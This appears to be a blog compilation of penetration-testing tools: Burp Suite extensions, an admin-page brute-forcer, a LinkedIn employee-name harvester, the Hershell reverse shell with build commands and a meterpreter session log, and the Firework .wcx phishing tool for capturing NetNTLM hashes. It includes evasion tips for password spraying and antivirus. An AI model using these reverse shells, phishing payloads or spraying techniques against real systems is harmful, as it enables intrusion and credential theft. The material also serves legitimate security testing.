Burpsuite Extensions – A collection of Burp Suite extensions

A collection of BurpSuite extensions.

Burpsuite Extensions gunziper

A plugin for the burpsuite (https://portswigger.net/burp/) which enables you to

  • “unpack” requests/responses (e.g. do an base64decode and afterwards a java deserialisation)
  • the possibility to gather e.g. a CSRF token from responses and automatically insert it in any request (without the need to do an extra request with burps macro functionality)
  • half automatically compare hundreds/thousands of responses for differences
    • Imagine you used intruder to test 10 GET parameters with payloads, and the application simply reflects the whole URL somewhere in the response. Of course, there might be XSS, but what about other vulnerabilities like SQL, XXE, … Sorting for the response size will not trivially point to relevant requests, so intruder comparer comes into play. With it, you can define a regex which strips parts of the response (e.g. the reflected URL) and then iterates over all responses and does a comparison of the last and current response, and if there are some differences, it will show a diff window similar to burp’s comparer. The libraries used for diffing are “Diff Match and Patch” (http://code.google.com/p/google-diff-match-patch) and “java-diff-utils” (http://code.google.com/p/java-diff-utils/).

Pre built jar files can be gathered from http://coding.f-block.org/

Also ReadHUNT – Burp Suite Pro/Free and OWASP ZAP Extensions

SAML ReQuest

A Burpsuite extension to test SAML authentication requests, used in many SSO implementations. It supports decoding and modification of SAML authentication requests and testing IdPs against manipulated requests. It is also integrated with Proxy, Repeater and Intruder, to make the maximum use of Burpsuite tools in testing SAML authentication requests.

Cangibrina – A Fast & Powerfull Dashboard (admin) Finder

Cangibrina is a multi platform tool which aims to obtain the Dashboard of sites using brute-force over wordlist, google, nmap, and robots.txt

Requirements:

  • Python 2.7
  • mechanize
  • PySocks
  • beautifulsoup4
  • html5lib
  • Nmap (–nmap)
  • TOR (–tor)

Also ReadPwnBack – Burp Extender Plugin That Generates A Sitemap Of A Website Using Wayback Machine

Cangibrina Installation

Linux

git clone https://github.com/fnk0c/cangibrina.git
cd cangibrina
pip install -r requirements.txt

Usage

usage: cangibrina.py [-h] -u U [-w W] [-t T] [-v] [--ext EXT] [--user-agent]
                     [--tor] [--search] [--dork DORK] [--nmap [NMAP]]

Fast and powerful admin finder

optional arguments:
  -h, --help     show this help message and exit
  -u U           target site
  -w W           set wordlist (default: wl_medium)
  -t T           set threads number (default: 5)
  -v             enable verbose
  --ext EXT      filter path by target extension
  --user-agent   modify user-agent
  --sub-domain   search for sub domains instead of directories
  --tor          set TOR proxy
  --search       use google and duckduckgo to search
  --dork DORK    set custom dork
  --nmap [NMAP]  use nmap to scan ports and services

Examples

python cangibrina.py -u facebook.com

python cangibrina.py -u facebook.com -v

python cangibrina.py -u facebook.com -w /root/diretorios.txt -t 10 -v

python cangibrina.py -u facebook.com --search -v

python cangibrina.py -u facebook.com --search --dork 'site:facebook.com inurl:login'

python cangibrina.py -u facebook.com -v --nmap

python cangibrina.py -u facebook.com -v --nmap 'sudo nmap -D 127.0.0.1 -F facebook.com'

python cangibrina.py -u facebook.com --user-agent

python cangibrina.py -u facebook.com --ext php

[IMPORTANT] DORK MUST BE WRITE BETWEEN QUOTES !
[Example] 'inurl:login.php'

GatherContacts – A Burp Suite Extension To Pull Employee Names From Google & Bing LinkedIn Search Results

GatherContacts is a Burp Suite Extension to pull Employee Names from Google and Bing LinkedIn Search Results.

As part of reconnaissance when performing a penetration test, it is often useful to gather employee names that can then be massaged into email addresses and usernames. The usernames may come in handy for performing a password spraying attack for example. One easy way to gather employee names is to use the following Burp Suite Pro extension as described below.

To collect employee names with Burp, you’ll need to do the following steps.

Also ReadSQLMap v1.2.9 – Automatic SQL Injection & Database Takeover Tool

Step 1

This extension uses the jsoup Java library. You will need to download jsoup and tell Burp where to find it as shown below.

Step 2

Add the “Gather Contacts” extension from the Extender–>Extensions tab as shown below:

Click Add–>SelectFile … and browse to the “GatherContacts.jar” file that you download from this repository.

Step 3

Configure the Extension to save output to a file. This is where your usernames will be written. You can optionally select the “Show in UI” option, but the output window truncates items when the list gets too long.

Step 4

Configure your browser to use Burp as a proxy as you normally would. From the browser, do a Google or Bing search of the following form (don’t forget the “/in” on the end of “linkedin.com”:

site:linkedin.com/in “Company Name”

Each of the employee names in the search results will be written to the output file you specified, as a tab delimited list. You can click on additional pages of results to get more employee names written to the file.

Step 5

You can gather a large list of employee names quickly and easily with this method. Try importing the list into Microsoft Excel where you can use formulas to turn employee names into the appropriate username format such as first initial followed by last name.

Step 6

When you are done, unload the Extension so you don’t burden Burp with inspecting all responses.

Note: If you aren’t getting a name written to the output file as you expect, it could be that the name was already ouput by the extension since it was loaded. To reset everything, unload (uncheck) the extension and then reload it.

Additional Information

For those of you not familiar with Excel formula’s, here are some formulas for creating usernames and email addresses from the output above. (Assume column B contains the first name and column C contains the last name)

GatherContacts Tips

Randomize the order of your username list before spraying to avoid being detected in some cases. You can add a column of random numbers to your spreadsheet using the =RAND() formula, then sort by this column.

Hershell – Simple TCP Reverse Shell Which Can Work On Multiple Systems

Hershell is a simple TCP reverse shell written in Go. It uses TLS to secure the communications, and provide a certificate public key fingerprint pinning feature, preventing from traffic interception.

Supported OS are:

  • Windows
  • Linux
  • Mac OS
  • FreeBSD and derivatives

Although meterpreter payloads are great, they are sometimes spotted by AV products. Since it’s written in Go, you can cross compile the source for the desired architecture.

Hershell Requirements

As this is a Go project, you will need to follow the official documentation to set up your Golang environment (with the $GOPATH environment variable).

Then, just run go get github.com/sysdream/hershell to fetch the project.

Building the payload

To simplify things, you can use the provided Makefile. You can set the following environment variables:

  • GOOS : the target OS
  • GOARCH : the target architecture
  • LHOST : the attacker IP or domain name
  • LPORT : the listener port

For the GOOS and GOARCH variables, you can get the allowed values here.

However, some helper targets are available in the Makefile:

  • depends : generate the server certificate (required for the reverse shell)
  • windows32 : builds a windows 32 bits executable (PE 32 bits)
  • windows64 : builds a windows 64 bits executable (PE 64 bits)
  • linux32 : builds a linux 32 bits executable (ELF 32 bits)
  • linux64 : builds a linux 64 bits executable (ELF 64 bits)
  • macos32 : builds a mac os 32 bits executable (Mach-O)
  • macos64 : builds a mac os 64 bits executable (Mach-O)

For those targets, you just need to set the LHOST and LPORT environment variables.

Also ReadFirework – Tool To Interact With Microsoft Workplaces Creating Valid Files

Using the shell

Once executed, you will be provided with a remote shell. This custom interactive shell will allow you to execute system commands through cmd.exe on Windows, or /bin/sh on UNIX machines.

The following special commands are supported:

  • run_shell : drops you an system shell (allowing you, for example, to change directories)
  • inject <base64 shellcode> : injects a shellcode (base64 encoded) in the same process memory, and executes it (Windows only at the moment).
  • meterpreter [tcp|http|https] IP:PORT : connects to a multi/handler to get a stage2 reverse tcp, http or https meterpreter from metasploit, and execute the shellcode in memory (Windows only at the moment)
  • exit : exit gracefully

Hershell Usage

First of all, you will need to generate a valid certificate:

$ make depends
openssl req -subj '/CN=yourcn.com/O=YourOrg/C=FR' -new -newkey rsa:4096 -days 3650 -nodes -x509 -keyout server.key -out server.pem
Generating a 4096 bit RSA private key
....................................................................................++
.....++
writing new private key to 'server.key'
-----
cat server.key >> server.pem
For windows:
# Predifined 32 bit target
$ make windows32 LHOST=192.168.0.12 LPORT=1234
# Predifined 64 bit target
$ make windows64 LHOST=192.168.0.12 LPORT=1234
For Linux:
# Predifined 32 bit target
$ make linux32 LHOST=192.168.0.12 LPORT=1234
# Predifined 64 bit target
$ make linux64 LHOST=192.168.0.12 LPORT=1234
For Mac OS X
$ make macos LHOST=192.168.0.12 LPORT=1234

Examples

Basic usage

One can use various tools to handle incomming connections, such as:

  • socat
  • ncat
  • openssl server module
  • metasploit multi handler (with a python/shell_reverse_tcp_ssl payload)

Here is an example with ncat:

$ ncat --ssl --ssl-cert server.pem --ssl-key server.key -lvp 1234
Ncat: Version 7.60 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 172.16.122.105.
Ncat: Connection from 172.16.122.105:47814.
[hershell]> whoami
desktop-3pvv31a\lab

Meterpreter staging

WARNING: this currently only work for the Windows platform.

The meterpreter staging currently supports the following payloads :

  • windows/meterpreter/reverse_tcp
  • windows/x64/meterpreter/reverse_tcp
  • windows/meterpreter/reverse_http
  • windows/x64/meterpreter/reverse_http
  • windows/meterpreter/reverse_https
  • windows/x64/meterpreter/reverse_https

To use the correct one, just specify the transport you want to use (tcp, http, https)

To use the meterpreter staging feature, just start your handler:

[14:12:45][172.16.122.105][Sessions: 0][Jobs: 0] > use exploit/multi/handler
[14:12:57][172.16.122.105][Sessions: 0][Jobs: 0] exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_https
payload => windows/x64/meterpreter/reverse_https
[14:13:12][172.16.122.105][Sessions: 0][Jobs: 0] exploit(multi/handler) > set lhost 172.16.122.105
lhost => 172.16.122.105
[14:13:15][172.16.122.105][Sessions: 0][Jobs: 0] exploit(multi/handler) > set lport 8443
lport => 8443
[14:13:17][172.16.122.105][Sessions: 0][Jobs: 0] exploit(multi/handler) > set HandlerSSLCert ./server.pem
HandlerSSLCert => ./server.pem
[14:13:26][172.16.122.105][Sessions: 0][Jobs: 0] exploit(multi/handler) > exploit -j
[*] Exploit running as background job 0.

[*] [2018.01.29-14:13:29] Started HTTPS reverse handler on https://172.16.122.105:8443
[14:13:29][172.16.122.105][Sessions: 0][Jobs: 1] exploit(multi/handler) >

Then, in hershell, use the meterpreter command:

[hershell]> meterpreter https 172.16.122.105:8443

A new meterpreter session should pop in msfconsole:

[14:13:29][172.16.122.105][Sessions: 0][Jobs: 1] exploit(multi/handler) >
[*] [2018.01.29-14:16:44] https://172.16.122.105:8443 handling request from 172.16.122.105; (UUID: pqzl9t5k) Staging x64 payload (206937 bytes) ...
[*] Meterpreter session 1 opened (172.16.122.105:8443 -> 172.16.122.105:44804) at 2018-01-29 14:16:44 +0100

[14:16:46][172.16.122.105][Sessions: 1][Jobs: 1] exploit(multi/handler) > sessions

Active sessions
===============

  Id  Name  Type                     Information                            Connection
  --  ----  ----                     -----------                            ----------
  1         meterpreter x64/windows  DESKTOP-3PVV31A\lab @ DESKTOP-3PVV31A  172.16.122.105:8443 -> 172.16.122.105:44804 (10.0.2.15)

[14:16:48][172.16.122.105][Sessions: 1][Jobs: 1] exploit(multi/handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: DESKTOP-3PVV31A\lab

Credit: Ronan Kervella

Burp Extensions – Burp Suite Extensions For The New Burp Suite API v1.5+

Burp Extensions collection of extensions for the new Burp Suite API (v1.5+) using Submodules for easy collection and updating. If you want to add a new module to the collection just send a Pull request or create an Issue. If you want your collection removed create an Issue.

The following command should pull down the latest versions.

git pull --recurse-submodules && git submodule update --init --recursive

Also ReadPwnBack – Burp Extender Plugin That Generates A Sitemap Of A Website Using Wayback Machine

BurpJDSer-ng

Deserializes java objects and encode them in XML using the Xtream library.

BurpAuthzPlugin

Test for authorization flaws

Burp Extensions Wsdler

Parses WSDL and creates SOAP requests for web services.

VBScan – OWASP Is A Black Box vBulletin Vulnerability Scanner

OWASP VBScan (short for [VB]ulletin Vulnerability [Scan]ner) is an opensource project in perl programming language to detect VBulletin CMS vulnerabilities and analysis them . If you want to do a penetration test on a vBulletin Forum, OWASP VBScan is Your best shot ever!

VBScan Usage

./vbscan.pl <target>
./vbscan.pl http://target.com/vbulletin

Also ReadHUNT – Burp Suite Pro/Free and OWASP ZAP Extensions

OWASP VBScan 0.1.7 introduction

Credit: Mohammad Reza Espargham

PwnBack – Burp Extender Plugin That Generates A Sitemap Of A Website Using Wayback Machine

PwnBack requires PhantomJS to run. To understand why it is required currently see the section PhantomsJS.

The plugin has several settings that a user can define depending on their hardware setup.

  • PhantomJS WebDrivers
    • The number of Firefox headless browsers to open. Be mindful of Burp Suite’s memory settings
  • HTTP Response Parsers
    • These are responsible for parsing requests generated by the WebDriver. You may gain very little by increasing this number.
  • Start Year
    • How far back in a Website’s history you’d like to traverse.
  • End Year
    • When to stop looking at a Website’s History
  • PhantomJS Location
    • The location of the PhantomJS binary
  • Output Folder
    • Where to save results when the Export Results button is pressed
  • Domain
    • The domain name to crawl. example.com, example.org, etc.
  • CA Bundle
    • The CA certificate you wish to use for PhantomJS. You shouldn’t need this, however, check Troubleshooting if no traffic is being generated.

Also ReadSQLMap v1.2.9 – Automatic SQL Injection & Database Takeover Tool

PwnBack Installation

In BurpSuite open the Extender Tab

Click the Add button

Locate the jar file included in this repo.

The current version of is v1.7.21, I am unable to guarantee backward support.

Build

Run the following commands

git clone https://github.com/k4ch0w/PwnBack.git
cd PwnBack
./gradlew fatJar

Troubleshooting

There is an issue with the JVM’s Cert storage on certain computers and the SSL certificate provided by archive.org If you see no traffic being generate run the following command and provide the path to the CA-Bundle

curl --remote-name --time-cond cacert.pem https://curl.haxx.se/ca/cacert.pem

Credit: Paul Ganea

Headless Burp – Automate security tests using Burp Suite

Headless Burp provides an extension to Burp that allows you to run Burp Suite’s Spider and Scanner tools in headless mode via command-line.

However, it can do more! It can produce a JUnit like report which in turn could instruct the CI server to mark the build as “failed” whenever any vulnerabilities are found. You can also mark some issues as false positives and those will not be reported anymore on the next scan reports.

Headless Burp Build

./mvnw

The extension is packaged as a fat jar at target/headless-burp-scanner-master-SNAPSHOT-jar-with-dependencies.jar

Also ReadPeda – Python Exploit Development Assistance for GDB

Usage

Bu8ld the extension as shown above or install it from the BApp Store

Using a loclally built extension jar

On *nix:

java -Xmx1G -Djava.awt.headless=true \
-classpath headless-burp-scanner-master-SNAPSHOT-jar-with-dependencies.jar:burpsuite_pro_v1.7.31.jar burp.StartBurp \
--unpause-spider-and-scanner \
--project-file=project.burp -c config.xml

On Cygwin:

java -Xmx1G -Djava.awt.headless=true \
-classpath "headless-burp-scanner-master-SNAPSHOT-jar-with-dependencies.jar;burpsuite_pro_v1.7.31.jar" burp.StartBurp \
--unpause-spider-and-scanner \
--project-file=project.burp -c config.xml

Using the extension from BApp Store

java -Xmx1G -Djava.awt.headless=true \
-classpath burpsuite_pro_v1.7.31.jar burp.StartBurp \
--unpause-spider-and-scanner \
--project-file=project.burp -c config.xml

On Cygwin:

java -Xmx1G -Djava.awt.headless=true \
-classpath "burpsuite_pro_v1.7.31.jar" burp.StartBurp \
--unpause-spider-and-scanner \
--project-file=project.burp -c config.xml

Configuration

<?xml version="1.0" encoding="UTF-8"?>
<config xmlns="http://nets.eu/burp/config">
    <reportType>HTML</reportType> <!-- JUNIT|HTML|XML -->
    <targetSitemap><![CDATA[http://localhost:5432]]></targetSitemap> <!-- atleast one of targetSitemap or scope must be specified -->
    <scope> <!-- atleast one of targetSitemap or scope must be specified -->
        <url><![CDATA[http://localhost:5432/]]></url> <!-- multiple allowed -->
        <exclusions> <!-- optional -->
            <exclusion><![CDATA[localhost:5432/#/logout]]></exclusion>
        </exclusions>
    </scope>
    <false-positives> <!-- optional -->
        <issue>
            <type>5244416</type>
            <path>.*</path>
        </issue>
        <issue>
            <type>5247488</type>
            <path>.*bower_components.*</path>
        </issue>
    </false-positives>
</config>

For an example configuration file, see config.xml and headless-burp-scanner-config.xsd for the xsd

Command-line options

--project-file=VAL          Open the specified project file; this will be created as a new project if the file does not exist (mandatory)
-c (--config) <file>        Configuration file (mandatory)
-p (--prompt)               Indicates whether to prompt the user to confirm the shutdown (useful for debugging)
-v (--verbose)              Enable verbose output

--diagnostics               Print diagnostic information
--use-defaults              Start with default settings
--collaborator-server       Run in Collaborator server mode
--collaborator-config=VAL   Specify Collaborator server configuration file; defaults to collaborator.config
--config-file=VAL           Load the specified project configuration file(s); this option may be repeated to load multiple files
--user-config-file=VAL      Load the specified user configuration file(s); this option may be repeated to load multiple files
--auto-repair               Automatically repair a corrupted project file specified by the --project-file option

Scenarios

The extension has been designed to be versatile and support several scenarios

Scenario A: Scan URL(s) for security issues using Burp

  1. Create a file – config.xml like below and add the URL(s) to be scanned to the scope.
<?xml version="1.0" encoding="UTF-8"?>
<config xmlns="http://nets.eu/burp/config">
    <reportType>HTML</reportType>
    <targetSitemap><![CDATA[http://localhost:5432]]></targetSitemap>
    <scope>
        <url><![CDATA[http://localhost:5432/auth]]></url>
        <url><![CDATA[http://localhost:5432/users]]></url>
        <url><![CDATA[http://localhost:5432/users/1]]></url>
        <url><![CDATA[http://localhost:5432/users?search=asd]]></url>
        <url><![CDATA[http://localhost:5432/bar/foo]]></url>
    </scope>
</config>
  1. Run as shown in the usage section

Scenario B: Scan URL(s) for security issues using Burp but exclude scanning of certain paths

  1. Add an exclusions block to the configuration file.
<?xml version="1.0" encoding="UTF-8"?>
<config xmlns="http://nets.eu/burp/config">
    <reportType>HTML</reportType>
    <targetSitemap><![CDATA[http://localhost:5432]]></targetSitemap>
    <scope>
        <url><![CDATA[http://localhost:5432/auth]]></url>
        <url><![CDATA[http://localhost:5432/users]]></url>
        <url><![CDATA[http://localhost:5432/users/1]]></url>
        <url><![CDATA[http://localhost:5432/users?search=asd]]></url>
        <url><![CDATA[http://localhost:5432/bar/foo]]></url>
        <exclusions>
            <exclusion><![CDATA[localhost:5432/#/logout]]></exclusion>
            <exclusion><![CDATA[localhost:5432/#/users/delete]]></exclusion>
            <exclusion><![CDATA[localhost:5432/#/creepy/crawly]]></exclusion>
        </exclusions>
    </scope>
</config>
  1. Run as shown in the usage section

Scenario C: Scan URL(s) for security issues using Burp but suppress false positives from the scan report

  1. Add a false-positives block with the issue type and path (these can be retrieved from a burp scan report) to the configuration file. You can find more details about Issue Definitions here
<?xml version="1.0" encoding="UTF-8"?>
<config xmlns="http://nets.eu/burp/config">
    <reportType>HTML</reportType>
    <targetSitemap><![CDATA[http://localhost:5432]]></targetSitemap>
    <scope>
        <url><![CDATA[http://localhost:5432/auth]]></url>
        <url><![CDATA[http://localhost:5432/users]]></url>
        <url><![CDATA[http://localhost:5432/users/1]]></url>
        <url><![CDATA[http://localhost:5432/users?search=asd]]></url>
        <url><![CDATA[http://localhost:5432/bar/foo]]></url>
        <exclusions>
            <exclusion><![CDATA[localhost:5432/#/logout]]></exclusion>
            <exclusion><![CDATA[localhost:5432/#/users/delete]]></exclusion>
            <exclusion><![CDATA[localhost:5432/#/creepy/crawly]]></exclusion>
        </exclusions>
        <false-positives>
            <issue>
                <type>5244416</type>
                <path>.*</path>
            </issue>
            <issue>
                <type>5247488</type>
                <path>.*bower_components.*</path>
            </issue>
        </false-positives>
    </scope>
</config>
  1. Run as shown in the usage section

Scenario D: Scan more than just GET requests. Use data derived from running functional tests as input to the scan

Sometimes, just spidering a target scope and and performing on a scope of URLs doesnt give much value. For e.g. when scanning a web application where routing is handled using JavaScript. Burp scans can discover more if it can scan more “real-world” requests and responses. This way, it can attack the target URLs more effectively and potentially discover more than a shot in the dark spider + scan approach.

To handle such cases, it would be best to let the burp proxy intercept some real traffic to the target and build up a sitemap for itself. The Headless Burp Proxy extension provides an simple way to achieve this.

  1. Follow instructions at Headless Burp Proxy and start up burp proxy and remember to set the --project-file option. This is where the “seed” data for scanning is going to be stored.
  2. Configure your functional/integration tests to go through the burp proxy (defaults to 4646 if you use the extension) by setting HTTP_PROXY or similar.
  3. Run the functional/integration tests against the target.
  4. Create a config.xml with the targetSitemap (typically, the base URL of the application), scope, exclusions, false-positives etc.
<?xml version="1.0" encoding="UTF-8"?>
<config xmlns="http://nets.eu/burp/config">
    <reportType>HTML</reportType>
    <targetSitemap><![CDATA[http://localhost:5432]]></targetSitemap>
    <scope>
        <url><![CDATA[http://localhost:5432]]></url>
        <exclusions>
            <exclusion><![CDATA[localhost:5432/#/logout]]></exclusion>
        </exclusions>
        <false-positives>
            <issue>
                <type>5244416</type>
                <path>.*</path>
            </issue>
        </false-positives>
    </scope>
</config>
  1. Run as shown in the usage section and remember to set the --project-file option

tl;dr;

The headless burp scanner plugin can do these

  • Run burp scan in headless or GUI mode
  • Specify target sitemap and add URL(s) to Burp’s target scope
  • Use the “seed” request/response data generated by any integration/functional tests you might have
  • Mark issues as false positives, these will not be reported in the scan report anymore.
  • Spider the target scope.
  • Actively scan the target scope.
  • Generate a scan report in JUnit/HTML/XML format.
  • Shut down Burp

Burp Maven Plugin

Maven plugin that allows you to run Burp Suite’s Proxy and Scanner tools in headless mode.

The plugin is essentially a wrapper around the Headless Burp Proxy and Headless Burp Scanner extensions. It offers easy way to integrate security testing using Burp Suite into the project build lifecycle.

Full example

<build>
    ...
    <plugins>
        ...
        <plugin>
            <groupId>eu.nets.burp</groupId>
            <artifactId>burp-maven-plugin</artifactId>
            <version>master-SNAPSHOT</version>
            <configuration>
                <burpSuite>burp/burpsuite_pro_v1.7.31.jar</burpSuite>
                <burpProjectFile>target/headless-burp-project.burp</burpProjectFile>
                <burpConfig>burp/config.xml</burpConfig>
                <headless>true</headless>
                <promptOnExit>false</promptOnExit>
                <verbose>true</verbose>
                <skip>false</skip>
            </configuration>
            <executions>
                <execution>
                    <id>start-burp-proxy</id>
                    <phase>pre-integration-test</phase>
                    <goals>
                        <goal>start-proxy</goal>
                    </goals>
                </execution>
                <execution>
                    <id>stop-burp-proxy</id>
                    <phase>post-integration-test</phase>
                    <goals>
                        <goal>stop-proxy</goal>
                    </goals>
                </execution>
                <execution>
                    <id>start-burp-scan</id>
                    <phase>verify</phase>
                    <goals>
                        <goal>start-scan</goal>
                    </goals>
                </execution>
            </executions>
        </plugin>
        ...
    </plugins>
    ...
</build>

Headless Burp Proxy

Provides an extension to Burp that allows you to run, stop and capture results from the Burp proxy tool in headless mode.

Features

  • Starts the burp proxy on a provided port (default 4646)
  • Register a shutdown listener and wait for a shutdown request (default "SHUTDOWN") on port (default 4444).
  • On receiving a shutdown request, saves the burp project file along with all the information regarding the proxied requests and responses, and finally shuts down Burp

Usage

Start Burp Proxy

On *nix:

java -Xmx1G -Djava.awt.headless=true \
-classpath headless-burp-proxy-master-SNAPSHOT-jar-with-dependencies.jar:burpsuite_pro_v1.7.31.jar burp.StartBurp \
--project-file=project.burp

On Cygwin:

java -Xmx1G -Djava.awt.headless=true \
-classpath "headless-burp-proxy-master-SNAPSHOT-jar-with-dependencies.jar;burpsuite_pro_v1.7.31.jar" burp.StartBurp \
--project-file=project.burp

Command-line Options

--project-file=VAL          Open the specified project file; this will be created as a new project if the file does not exist (mandatory)
--proxyPort VAL             Proxy port
--shutdownPort VAL          Shutdown port
--shutdownKey VAL           Shutdown key
-p (--prompt)               Indicates whether to prompt the user to confirm the shutdown (useful for debugging)
-v (--verbose)              Enable verbose output

--diagnostics               Print diagnostic information
--use-defaults              Start with default settings
--collaborator-server       Run in Collaborator server mode
--collaborator-config=VAL   Specify Collaborator server configuration file; defaults to collaborator.config
--config-file=VAL           Load the specified project configuration file(s); this option may be repeated to load multiple files
--user-config-file=VAL      Load the specified user configuration file(s); this option may be repeated to load multiple files
--auto-repair               Automatically repair a corrupted project file specified by the --project-file option

Stop Burp Proxy

echo SHUTDOWN >> /dev/tcp/127.0.0.1/4444
or
echo SHUTDOWN | netcat 127.0.0.1 4444
or
echo SHUTDOWN | ncat 127.0.0.1 4444

Firework – Tool To Interact With Microsoft Workplaces Creating Valid Files

Firework is a proof of concept tool to interact with Microsoft Workplaces creating valid files required for the provisioning process. The tool also wraps some code from Responder to leverage its ability to capture NetNTLM hashes from a system that provisions a Workplace feed via it.

This tool may be used as part of a penetration test or red team exercise to create a .wcx payload (and associated feed) that if clicked on could be used to:

  • Phish for credentials – NetNTLM hashes will be sent if a user enters their credentials (or on older versions of Windows automatically).
  • Add items to the Start-Menu – After set-up shortcuts are added to the Start-Menu which launch the served RDP file(s). These entries could potentially be used as part of a wider social engineering campaign.
  • Download resources – Resources such as the .rdp files and icon files are downloaded and updated by Windows on a daily basis (if authentication of the feed is disabled or is satisfied).

Firework Installation

  • Tested with Python 2.7.x. (Python3 not currently supported, although the main Firework class could be used in Python 3)
$ pip install -r requirements.txt
  • The tool serves content over HTTPS and requires a certificate and private key to use in-built web server with NetNTLM capture. Default files: cert.crt and key.pem

Also ReadKisMac2 – Free Open Source Wireless Stumbling & Security Tool For Mac OS X

Usage


.-:::::'::::::::::..  .,::::::.::    .   .:::  ...    :::::::..    :::  .   
;;;'''' ;;;;;;;``;;;; ;;;;''''';;,  ;;  ;;;'.;;;;;;;. ;;;;``;;;;   ;;; .;;,.
[[[,,== [[[ [[[,/[[['  [[cccc  '[[, [[, [[',[[     \[[,[[[,/[[['   [[[[[/'  
`$$$"`` $$$ $$$$$$c    $$""""    Y$c$$$c$P $$$,     $$$$$$$$$c    _$$$$,    
 888    888 888b "88bo,888oo,__   "88"888  "888,_ _,88P888b "88bo,"888"88o, 
 "MM,   MMM MMMM   "W" """"YUMMM   "M "M"    "YMMMMMP" MMMM   "W"  MMM "MMP"


usage: firework.py [-h] -c COMPANY -u URL -a APP -e EXT -i ICON [-l LISTEN]
                   [-r RDP] [-d DOMAIN] [-n USERNAME] [-p PASSWORDHASH]
                   [-t CERT] [-k KEY]

WCX workplace tool

optional arguments:
  -h, --help            show this help message and exit
  -c COMPANY, --company COMPANY
                        Company name
  -u URL, --url URL     Feed URL
  -a APP, --app APP     App Name
  -e EXT, --ext EXT     App Extension
  -i ICON, --icon ICON  App Icon
  -l LISTEN, --listen LISTEN
                        TLS Web Server Port
  -r RDP, --rdp RDP     RDP Server
  -d DOMAIN, --domain DOMAIN
                        RDP Domain
  -n USERNAME, --username USERNAME
                        RDP Username
  -p PASSWORD, --password PASSWORD
                        RDP Password
  -t CERT, --cert CERT  SSL cert
  -k KEY, --key KEY     SSL key

Examples

Basic example:

  • Organisation Name: EvilCorp
  • URL to feed XML (or URL to Firework’s in-built server): https://example.org/ – This is where Windows downloads the feed from.
  • Application Name: Firework
  • File Extension: .fwk
  • Icon File: firework.ico
python ./firework.py -c EvilCorp -u https://example.org/ -a Firework -e .fwk -i ./firework.ico

In built web server will start on port 443 if cert.crt and key.pem are present in current directory. This will force an NTLM challenge with responder. If these files are not present the tool will write all files to local directory for your own hosting.

If you wish to start the in-built web server on alternate port use the -l flag as below:

python ./firework.py -c EvilCorp -u https://example.org/ -a Firework -e .fwk -i ./firework.ico

You can also add some customisations to the .rdp file that gets served.

  • Remote Desktop Server: dc.corp.local
  • Domain: corp.local
  • Username: admin
  • Password Crypt: Encrypted password that gets included in RDP file

Note: Passwords stored in .rdp files are likely ignored in a default config.

python ./firework.py -c EvilCorp -u https://example.org/ -a Firework -e .fwk -i ./firework.ico -r dc.corp.local -d corp.local -n admin -p <crypt password>

Payload

Having run the tool ‘payload.wcx’ will be written to current directory. This file is what when clicked on starts the provisioning process.

Credit: David Middlehurst

HUNT – Burp Suite Pro/Free and OWASP ZAP Extensions

HUNT Suite is a collection of Burp Suite Pro/Free and OWASP ZAP extensions. Identifies common parameters vulnerable to certain vulnerability classes (Burp Suite Pro and OWASP ZAP). Organize testing methodologies (Burp Suite Pro and Free).

HUNT Parameter Scanner – Vulnerability Classes

  • SQL Injection
  • Local/Remote File Inclusion & Path Traversal
  • Server Side Request Forgery & Open Redirect
  • OS Command Injection
  • Insecure Direct Object Reference
  • Server Side Template Injection
  • Logic & Debug Parameters

HUNT Suite for Burp Suite Pro/Free

HUNT Parameter Scanner (hunt_scanner.py)

This extension does not test these parameters, but rather alerts on them so that a bug hunter can test them manually. For each class of vulnerability, Bugcrowd has identified common parameters or functions associated with that vulnerability class. We also provide curated resources in the issue description to do thorough manual testing of these vulnerability classes.

Also Readhtrace.sh – Simple Shell Script To Debugging Http/Https Traffic Tracing

HUNT Testing Methodology (hunt_methodology.py)

This extension allows testers to send requests and responses to a Burp Suite tab called “HUNT Methodology”. This tab contains a tree on the left side that is a visual representation of your testing methodology. By sending request/responses here testers can organize or attest to having done manual testing in that section of the application or having completed a certain methodology step.

Installing HUNT Suite for Burp Suite Pro/Free

Getting Started

  • Download the latest standalone Jython jar.
  • Navigate to Extender -> Options.
    • Locate the section called Python Environment.
    • Add the location of the Jython jar by clicking Select file….

  • Navigate to Extender -> Extensions.
    • Click Add.
    • Locate Extension Details.
      • Select “Python” as the Extension Type.
      • Click “Select file…” to select the location of where the extension is located in your filesystem.
      • Do this for both the HUNT Parameter Scanner and HUNT Testing Methodology

  • The HUNT Parameter Scanner will begin to run across traffic that flows through the proxy.

Setting Scope

This is an important step to set your testing scope as the passive scanner is incredibly noisy. Instead of polluting the Scanner window, the HUNT Parameter Scanner creates its own window with its own findings.

  • Navigate to Target -> Scope.
    • Click the “Use advanced scope control” checkbox.
    • Click add to include to your scope.

  • Navigate to Scanner -> Live scanning.
    • Under the “Live Passive Scanning” section, click “Use suite scope [defined in the target tab]”.

HUNT Scanner for OWASP ZAP (Alpha – Contributed by Ricardo Lobo @_sbzo)

  • Find the “Manage Addons” icon, ensure you have Python Scripting installed.
  • Ensure “show All Tabs” icon is clicked
  • Click the Tools menu, navigate to the Options section. Select Passive Scanner and check the box Scan messages only in scope and then OK
  • Click into the Scripts tab (next to the Sites tab)
  • Click the load script icon and load each python script into ZAP. They should appear under passive rules
  • Right click on each script under passive rules and enable them and save them
  • Browse sites and recieve alerts!

Important Notes

HUNT Parameter Scanner leverages the passive scanning API within Burp. Here are the conditions under which passive scan checks are run:

  • First request of an active scan
  • Proxy requests
  • Any time “Do a passive scan” is selected from the context menu

Passive scans are not run on the following:

  • On every active scan response
  • On Repeater responses
  • On Intruder responses
  • On Sequencer responses
  • On Spider responses

Credit: JP Villanueva & Jason Haddix